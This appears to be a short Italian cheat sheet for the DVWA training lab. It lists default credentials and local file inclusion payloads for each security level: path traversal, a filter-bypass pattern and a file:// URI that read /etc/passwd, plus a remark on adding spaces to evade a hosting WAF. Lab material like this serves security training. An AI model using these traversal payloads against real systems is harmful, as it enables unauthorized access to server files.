DVWA Cheat Sheet - Quick Copy Panel
| Componente / Livello | Contenuto & Azione di Copia |
|---|---|
| Database & Apache |
sudo systemctl restart mariadb apache2
|
| Avviare DVWA |
http://127.0.0.1/DVWA/login.php
|
| Username |
admin
|
| Password |
password
|
| Low Security (Rimuove spazi vuoti inseriti per aggirare il WAF dell'hosting) |
http://127.0.0.1/DVWA/vulnerabilities/fi/?page= . . / . . / . . / . . / . . / . . / . . / . . /etc/passwd
|
| Medium Security |
http://127.0.0.1/DVWA/vulnerabilities/fi/?page=..././..././..././etc/passwd
|
| High Security |
http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file:///etc/passwd
|
Low security
Payload (su linux, rimuovere gli spazi inseriti per aggirare il WAF)
http://127.0.0.1/DVWA/vulnerabilities/fi/?page= ../ ../ ../ ../ ../ ../ etc / passwd
Medium security
?page=…/./…/./…/./…/./…/./…/./etc/passwd
High security
http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file:///etc/passwd
Impossible level of security
0 commenti